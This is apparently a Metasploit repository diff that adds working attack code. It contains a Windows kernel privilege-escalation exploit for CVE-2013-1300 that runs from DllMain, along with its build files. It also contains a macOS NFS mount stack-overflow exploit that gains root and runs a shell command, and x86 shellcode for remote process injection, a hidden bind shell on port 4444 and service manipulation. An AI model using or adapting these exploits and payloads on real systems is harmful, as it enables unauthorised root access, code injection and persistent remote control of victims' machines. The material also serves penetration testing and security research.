+	DWORD allocsize = 0x4000;
+	int x=0;
+
+	NtAllocateVirtualMemory_T * pfnNtAllocateVirtualMemory = 0;
+	pfnNtAllocateVirtualMemory = (NtAllocateVirtualMemory_T *)GetProcAddress(
+        GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+	
+
+	unsigned o = (0x20 / 4); // the offset into the page
+	NTSTATUS res = 0x0;
+
+	for(x=0; x<0x60; x++) {
+		res = pfnNtAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID*)&addr, 0, &allocsize, 0x3000, 0x40);
+		if(res == 0x0) {
+			
+			break;
+		}
+		
+		addr += 0x10000;
+	}
+	if(res!=0) return FALSE;
+	memset((void*)addr, 0xab, 0x4000);
+	UINT *eprocess = (UINT*)addr+o;
+	UINT *before = (UINT*)addr;
+	// large enough values to hold reference
+	before[2] = 0x00080000;
+	before[3] = 0x400000;
+	UINT *second = (UINT*)addr + (0x1000/4);	
+	for(x=0; x<100; x++) eprocess[x] = (0xdead<<16) + (0xaa00 | x);
+
+	eprocess[0] = 0x03030303; // least significant byte == 0x3
+
+	// Pointer to EPROCESS_QUOTA_BLOCK
+	// Will point into the window object and on decrement flip the flag to enable the kernel mode window procedure
+	eprocess[0xd4/4] = address;
+
+	gEPROCESS = (unsigned int)eprocess;
+	//for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x);
+	//second[0x20] = 0x2;
+	//second[0x30] = 0x1;
+	return TRUE;
+}
+
+DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) {
+	if(msg == EXPLOIT_MSG) {
+		// triggering the exploit through WM_GETTEXT
+		// printf("[-] WM_GETTEXT message\n");
+		unsigned char payload[] = "ABCDE   ";
+		payload[7] = (gEPROCESS>>16) & 0xff;
+		memcpy((void *) lparam, (void *)payload, 8);
+		return 8;
+	}
+	return DefWindowProcA(hwnd, msg, wparam, lparam);
+}
+
+DWORD windowthreadproc(LPVOID arg) {
+	WNDCLASSA wndclass;
+	HANDLE hinst = GetModuleHandleA(0);
+	DWORD rc = 0;
+	MSG msg;
+
+	wndclass.style         = 0x4000;
+	wndclass.lpfnWndProc   = (WNDPROC)wndproc;
+	wndclass.cbClsExtra    = 0;
+	wndclass.cbWndExtra    = 0;
+	wndclass.hInstance     = (HINSTANCE)hinst;
+	wndclass.hIcon         = LoadIconA(0, (LPCSTR)0x107);
+	wndclass.hCursor       = 0;
+	wndclass.hbrBackground = (HBRUSH)6;
+	wndclass.lpszMenuName  = 0;
+	wndclass.lpszClassName = (LPCSTR) 0x1337;
+	rc=RegisterClassA(&wndclass);
+	
+	HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1337, "Jon Rocks!", 0, 0, 0, 0, 0, 0, 0, 0, hinst);
+	
+	gHwnd = windowhandle;
+
+	while(1) {
+		GetMessageA(&msg, 0x0, 0x0, 0x0);
+		TranslateMessage(&msg);
+		DispatchMessageA(&msg);
+	}
+
+	return 0;
+}
+
+DWORD NtUserMessageCall(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam, DWORD result, DWORD fnid, DWORD ansi) {
+	__asm {
+		push	ansi
+		push	fnid
+		push	result
+		push	lparam
+		push	wparam
+		push	msg
+		push	hwnd
+		push    0xdeadbeef
+		mov		eax, 11eah
+		mov		edx, 7ffe0300h
+		call	[edx]
+		add		esp, 20h
+	}
+}
+
+typedef struct _CLIENT_ID
+{
+    PVOID UniqueProcess;
+    PVOID UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef long (*_RtlCreateUserThread)(HANDLE,
+       PSECURITY_DESCRIPTOR,
+       BOOLEAN,ULONG,
+       PULONG,PULONG,
+       PVOID,PVOID,
+       PHANDLE,PCLIENT_ID);
+ 
+_RtlCreateUserThread RtlCreateUserThread;
+
+int Schlamperei()
+{
+	// Create window which will execute the wndproc in kernel mode
+	HWND wnd = createhelperwnd();
+
+	// Retrieve memory address of window using gSharedInfo
+	DWORD addressofwnd = gethandleaddress(wnd);
+
+	 HMODULE ntdll=LoadLibraryA("ntdll.dll");
+	RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread");
+
+	// Allocate fake EPROCESS in user mode
+	// see "Kernel Pool Exploitation on Windows 7" by Tarjei Mandt
+	if(!AllocFakeEProcess(addressofwnd-0x80+0x15)) {
+		return 0;
+	}
+
+	// Create window in new thread to trigger inter thread message sending
+	HANDLE thread = CreateThread(0,0,(LPTHREAD_START_ROUTINE)windowthreadproc,0,0,0);
+
+	Sleep(0x1000);
+
+	// 0x9 is size of allocation, results in buffer (8 + 4) = 12
+	// 8 byte block allocations = 16 bytes
+	// so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer
+	unsigned char *buf = (unsigned char *)malloc(16);
+	for(int i=0; i<0x40; i++) {
+		NtUserMessageCall(gHwnd, EXPLOIT_MSG, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10);
+	}
+
+	SendMessage(wnd, 0x401, addressofwnd, 0x0);
+	
+	ExitProcess(0);
+}
+
+extern HINSTANCE hAppInstance;
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
+	BOOL bReturnValue = TRUE;
+	switch (dwReason) {
+		case DLL_QUERY_HMODULE:
+			hAppInstance = hinstDLL;
+			if (lpReserved != NULL) {
+				*(HMODULE *)lpReserved = hAppInstance;
+			}
+			break;
+		case DLL_PROCESS_ATTACH:
+			Schlamperei();
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+			break;
+	}
+	return bReturnValue;
+};
+
+
diff --git a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj
new file mode 100755
index 0000000000..2a78c73931
--- /dev/null
+++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj
@@ -0,0 +1,111 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{C093C490-61BF-433E-AEB4-80753B20DEC7}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectName>schlamperei</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\cve-2013-1300\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\cve-2013-1300\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\cve-2013-1300\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="schlamperei.c">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
+      <PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeaderFile>
+      <PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeaderOutputFile>
+      <PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeaderFile>
+      <PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeaderOutputFile>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index a7893e8d85..a66e6017bd 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -47,11 +47,19 @@ IF "%ERRORLEVEL%"=="0" (
   POPD
 )
 
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building CVE-2013-1300 (schlamperei)"
+  PUSHD CVE-2013-1300
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
 IF "%ERRORLEVEL%"=="0" (
   ECHO "Building bypassuac (on-disk)"
   PUSHD bypassuac
   msbuild.exe make.msbuild /target:%PLAT%
   POPD
+
 )
 
 IF "%ERRORLEVEL%"=="0" (
@@ -61,6 +69,15 @@ IF "%ERRORLEVEL%"=="0" (
   POPD
 )
 
+)
+
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building IE11 Sandbox bypasses"
+  PUSHD IE11SandboxEscapes
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
 FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
 SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
 echo Finished %ldt%
diff --git a/external/source/osx/nfs_mount_priv_escalation.c b/external/source/osx/nfs_mount_priv_escalation.c
new file mode 100644
index 0000000000..86098b5a44
--- /dev/null
+++ b/external/source/osx/nfs_mount_priv_escalation.c
@@ -0,0 +1,165 @@
+/*
+ * Apple Mac OS X Lion Kernel <=  xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
+ * CVE None
+ * by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com>
+ *
+ *
+ * Notes:
+ *  This exploit leverage a stack overflow vulnerability to escalate privileges.
+ *  The vulnerable function nfs_convert_old_nfs_args does not verify the size 
+ *  of a user-provided argument before copying it to the stack. As a result by
+ *  passing a large size, a local user can overwrite the stack with arbitrary 
+ *  content.
+ *
+ * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
+ * Tested on Max OS X Lion xnu-1699.32.7  (x86_64)
+ *
+ *   Greets to taviso, spender, joberheide
+ */
+  
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <errno.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/param.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+  
+/** change these to fit your environment if needed **/
+#define SSIZE       (536)
+  
+/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
+struct user_nfs_args {
+    int     version;    /* args structure version number */
+    char*   addr __attribute__((aligned(8)));       /* file server address */
+    int     addrlen;    /* length of address */
+    int     sotype;     /* Socket type */
+    int     proto;      /* and Protocol */
+    char *  fh __attribute__((aligned(8)));     /* File handle to be mounted */
+    int     fhsize;     /* Size, in bytes, of fh */
+    int     flags;      /* flags */
+    int     wsize;      /* write size in bytes */
+    int     rsize;      /* read size in bytes */
+    int     readdirsize;    /* readdir size in bytes */
+    int     timeo;      /* initial timeout in .1 secs */
+    int     retrans;    /* times to retry send */
+    int     maxgrouplist;   /* Max. size of group list */
+    int     readahead;  /* # of blocks to readahead */
+    int     leaseterm;  /* obsolete: Term (sec) of lease */
+    int     deadthresh; /* obsolete: Retrans threshold */
+    char*   hostname __attribute__((aligned(8)));   /* server's name */
+    /* NFS_ARGSVERSION 3 ends here */
+    int     acregmin;   /* reg file min attr cache timeout */
+    int     acregmax;   /* reg file max attr cache timeout */
+    int     acdirmin;   /* dir min attr cache timeout */
+    int     acdirmax;   /* dir max attr cache timeout */
+    /* NFS_ARGSVERSION 4 ends here */
+    uint    auth;       /* security mechanism flavor */
+    /* NFS_ARGSVERSION 5 ends here */
+    uint    deadtimeout;    /* secs until unresponsive mount considered dead */
+};
+  
+/** sets the uid for the current process  and safely exits from the kernel**/
+static void r00t_me() {
+    asm(
+        // padding
+        "nop; nop; nop; nop;"
+  
+        // task_t %rax = current_task()
+        "movq   %%gs:0x00000008, %%rax;"
+        "movq   0x00000348(%%rax), %%rax;"
+         
+        // proc %rax = get_bsdtask_info()
+        "movq   0x000002d8(%%rax),%%rax;"
+         
+        // ucred location at proc
+        "movq   0x000000d0(%%rax),%%rax;"
+         
+        // uid = 0
+        "xorl   %%edi, %%edi;"     
+        "movl   %%edi, 0x0000001c(%%rax);"
+        "movl   %%edi, 0x00000020(%%rax);"
+         
+        // fix the stack pointer and return (EACCES)
+        "movq   $13, %%rax;"
+        "addq   $0x00000308,%%rsp;"
+        "popq   %%rbx;"
+        "popq   %%r12;"
+        "popq   %%r13;"
+        "popq   %%r14;"
+        "popq   %%r15;"
+        "popq   %%rbp;"
+        "ret;"
+        :::"%rax"
+    );
+}
+  
+int main(int argc, char ** argv) {
+    struct user_nfs_args xdrbuf;
+    char * path;
+    char obuf[SSIZE];
+  
+  
+    /** clear the arguments **/
+    memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
+    memset(obuf, 0x00, SSIZE);
+  
+    /** set up variable to get path to vulnerable code **/
+    xdrbuf.version = 3;
+    xdrbuf.hostname = "localhost";
+    xdrbuf.addrlen = SSIZE;
+    xdrbuf.addr = obuf;
+     
+    /** set ret address **/
+    *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
+    printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);
+         
+    /** create a unique tmp name **/
+    if ((path = tmpnam(NULL)) == NULL) {
+        // path can be any directory which we have read/write/exec access
+        // but I'd much rather create one instead of searching for one
+        perror("[-] tmpnam");
+        exit(EXIT_FAILURE);
+    }
+     
+    /** make the path in tmp so that we can use it **/
+    if (mkdir(path, 0660) < 0) {
+        perror("[-] mkdir");
+        exit(EXIT_FAILURE);
+    }
+     
+    /** inform the user that the path was created **/
+    printf("[*] created sploit path%s\n", path);
+     
+    /** call the vulnerable function **/
+    if (mount("nfs", path, 0, &xdrbuf) < 0) {
+        if (errno == EACCES) {
+            puts("[+] escalating privileges...");
+        } else {
+            perror("[-] mount");
+        }
+         
+    }
+     
+    /** clean up tmp dir **/
+    if (rmdir(path) < 0) {
+        perror("[-] rmdir");
+    }
+     
+    /** check if privs are equal to root **/
+    if (getuid() != 0) {
+        puts("[-] priviledge escalation failed");
+        exit(EXIT_FAILURE);
+    }
+     
+    /** get root shell **/
+    printf("[+] We are now uid=%i ... your welcome!\n", getuid());
+    printf("[+] Dropping a shell.\n");
+
+    /** execute **/
+    execl("/bin/sh", "/bin/sh", "-c", argv[1], NULL);
+    return 0;
+}
diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
new file mode 100644
index 0000000000..50252ad53e
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
@@ -0,0 +1,82 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 307 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+xor edi, edi
+push 0x00000004 ;PAGE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
+push edi 
+push 0xE553A458 ;call VirtualAlloc() 
+call ebp
+
+mov dword [eax], 0x44
+lea esi, [eax+0x44]
+push edi
+push 0x6578652e
+push 0x32336c6c
+push 0x646e7572
+mov ecx, esp	;"rundll32.exe"
+push esi		;lpProcessInformation
+push eax		;lpStartupInfo
+push edi		;lpCurrentDirectory
+push edi		;lpEnvironment
+push 0x00000044	;dwCreationFlags
+push edi		;bInheritHandles
+push edi		;lpThreadAttributes
+push edi		;lpProcessAttributes
+push ecx		;lpCommandLine
+push edi		;lpApplicationName
+push 0x863FCC79
+call ebp 		;call CreatProcessA()
+
+mov ecx, [esi]
+push 0x00000040 ;PAGE_EXECUTE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00001000	;Next Shellcode Size
+push edi
+push ecx		;hProcess
+push 0x3F9287AE ;call VirtualAllocEx()
+call ebp
+
+call me2
+me2:
+pop edx
+
+mov edi, eax
+mov ecx, [esi]
+add dword edx, 0x112247   ;pointer on the next shellcode
+push esp
+push 0x00001000	;Next Shellcode Size
+push edx		;
+push eax		;lBaseAddress
+push ecx		;hProcess
+push 0xE7BDD8C5
+call ebp 		;call WriteProcessMemory()
+
+xor eax, eax
+mov ecx, [esi]
+push eax		;lpThreadId
+push eax		;dwCreationFlags
+push eax		;lpParameter
+push edi		;lpStartAddress
+push eax		;dwStackSize
+push eax		;lpThreadAttributes
+push ecx		;hProcess
+push 0x799AACC6
+call ebp 		;call CreateRemoteThread()
+
+mov ecx, [esi]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
+
+mov ecx, [esi+0x4]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
new file mode 100644
index 0000000000..3b708b9c48
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
@@ -0,0 +1,91 @@
+;-----------------------------------------------------------------------------;
+; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (February 2014)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
+  push 0x5F327377        ; ...
+  push esp               ; Push a pointer to the "ws2_32" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "ws2_32" )
+  
+  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
+  sub esp, eax           ; alloc some space for the WSAData structure
+  push esp               ; push a pointer to this stuct
+  push eax               ; push the wVersionRequested parameter
+  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+  call ebp               ; WSAStartup( 0x0190, &WSAData );
+  
+  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
+  push eax               ; push null for reserved parameter
+  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
+  push eax               ; we do not specify a protocol
+  inc eax                ;
+  push eax               ; push SOCK_STREAM
+  inc eax                ;
+  push eax               ; push AF_INET
+  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
+  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+  xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
+  
+  xor ebx, ebx           ; Clear EBX
+  push ebx               ; bind to 0.0.0.0
+  push 0x5C110002        ; family AF_INET and port 4444
+  mov esi, esp           ; save a pointer to sockaddr_in struct
+  push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+  push esi               ; pointer to the sockaddr_in struct
+  push edi               ; socket
+  push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
+  call ebp               ; bind( s, &sockaddr_in, 16 );
+
+  ; Hidden ACL Support  ----------
+
+  push 0x1               ; size, in bytes, of the buffer pointed to by the "optval" parameter
+  push esp               ; optval: pointer to the buffer in which the value for the requested option is specified
+  push 0x3002            ; level at which the option is defined: SOL_SOCKET
+  push 0xFFFF            ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT
+  push edi               ; socket descriptor
+  push 0x2977A2F1        ; hash( "ws2_32.dll", "setsockopt" )
+  call ebp               ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 );
+
+  push ebx               ; backlog
+  push edi               ; socket
+  push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
+  call ebp               ; listen( s, 0 );
+    
+condition:
+  push ebx                ; dwCallbackData (ebx = 0, no data needed for the condition function)
+  call wsaaccept          ; push the start of the condition function on the stack
+  mov eax, DWORD [esp+4]  ;  
+  mov eax, DWORD [eax+4]  ; 
+  mov eax, DWORD [eax+4]  ; get the client IP returned in the stack
+  sub eax, 0x2101A8C0     ; compare the client IP with the IP allowed
+  jz return               ; if equal returns CF_ACCEPT
+  xor eax, eax            ; If not equal, the condition function returns CF_REJECT
+  inc eax
+return:
+  retn 0x20               ; some stack alignment needed to return to mswsock
+
+wsaaccept:
+  push ebx                ; length of the sockaddr = nul
+  push ebx                ; struct sockaddr = nul
+  push edi                ; socket descriptor
+  push 0x33BEAC94         ; hash( "ws2_32.dll", "wsaaccept" )
+  call ebp                ; wsaaccept( s, 0, 0, &fnCondition, 0)
+  inc eax
+  jz condition            ; if error (eax = -1) jump to condition function to wait for another connection
+  dec eax
+  
+  push edi                ; push the listening socket to close
+  xchg edi, eax           ; replace the listening socket with the new connected socket for further comms
+  push 0x614D6E75         ; hash( "ws2_32.dll", "closesocket" )
+  call ebp                ; closesocket( s );
+   
diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm
new file mode 100644
index 0000000000..2ba827b154
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_service.asm
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push byte 0x0
+push 0x32336970
+push 0x61766461
+push esp
+push 0x726774c
+call ebp		;load advapi32.dll
+push 0x00454349
+push 0x56524553
+mov ecx, esp	;ServiceTableEntry.SVCNAME
+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
+push 0x00000000
+push eax
+push ecx
+mov eax,esp
+push 0x00000000
+push eax
+push 0xCB72F7FA
+call ebp		;call StartServiceCtrlDispatcherA(ServiceTableEntry)
+push 0x00000000
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
+pop eax			;SvcCtrlHandler
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+cld 			;SvcMain
+call me
+me:
+pop ebp
+sub ebp, 0xd6	;ebp => hashFunction
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+lea eax, [ebp+0xc9];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp		;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000004
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp		;SetServiceStatus RUNNING
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm
new file mode 100644
index 0000000000..cdd1ba61bc
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm
@@ -0,0 +1,41 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push 0x000F003F
+push 0x00000000
+push 0x00000000
+push 0x7636F067
+call ebp 		;OpenSCManagerA
+mov edi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+push 0x000F01FF
+push ecx
+push eax
+push 0x404B2856
+call ebp 		;OpenServiceA
+mov esi, eax
+push 0x00464349
+push 0x56524553
+mov ecx, esp
+push 0x00000000
+push ecx
+mov ecx, esp	;SVCDESCRIPTION
+push ecx
+push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION
+push eax
+push 0xED35B087
+call ebp 		;ChangeServiceConfig2A
+push esi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp
+push edi
+push 0xAD77EADE	;CloseServiceHandle
+call ebp
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm
new file mode 100644
index 0000000000..10c8374c32
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm
@@ -0,0 +1,45 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+call me3
+me3:
+pop edi
+jmp 0x7
+pop eax
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+push 0x00464349
+push 0x56524553
